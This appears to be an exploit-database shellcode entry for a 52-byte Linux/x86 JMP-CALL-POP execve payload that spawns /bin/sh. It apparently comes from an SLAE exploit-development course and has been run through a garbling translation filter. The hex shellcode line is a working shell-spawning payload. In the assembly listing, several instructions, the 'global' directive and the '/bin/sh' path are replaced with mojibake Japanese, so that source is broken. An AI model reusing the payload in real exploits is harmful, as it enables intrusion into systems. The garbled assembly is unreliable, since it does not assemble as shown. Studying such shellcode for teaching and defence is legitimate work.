Linux/x86 - JMP-CALL-POP execve Çú·â¤¹¤ë

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£

Linux/x86 - JMP-CALL-POP execve Çú·â¤¹¤ë - 52 bytes

;Description:  JMP-CALL-POP execve Çú·â¤¹¤ë (52 bytes)
;Shellcode:    \xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68
;Author:       Paolo Stivanin <https://github.com/polslinux>
;SLAE ID:      526 

Á´À¤³¦¤Î _start

section .text
_start:
    jmp short here

me:
    pop esi
    mov edi,esi
    
    xor eax,eax
    ²¡¤·¿Ê¤á¤ë eax
    mov edx,esp
    
    ²¡¤·¿Ê¤á¤ë eax
    ÄÉ²Ã¤¹¤ë esp,3
    lea esi,[esi +4]
    xor eax,[esi]
    ²¡¤·¿Ê¤á¤ë eax
    xor eax,eax
    xor eax,[edi]
    ²¡¤·¿Ê¤á¤ë eax
    mov ebx,esp 

    xor eax,eax
    ²¡¤·¿Ê¤á¤ë eax
    lea edi,[ebx]
    ²¡¤·¿Ê¤á¤ë edi
    mov ecx,esp

    mov al,0xb
    int 0x80

here:
    call me
    path db "//ÃùÂ¢½ê/sh"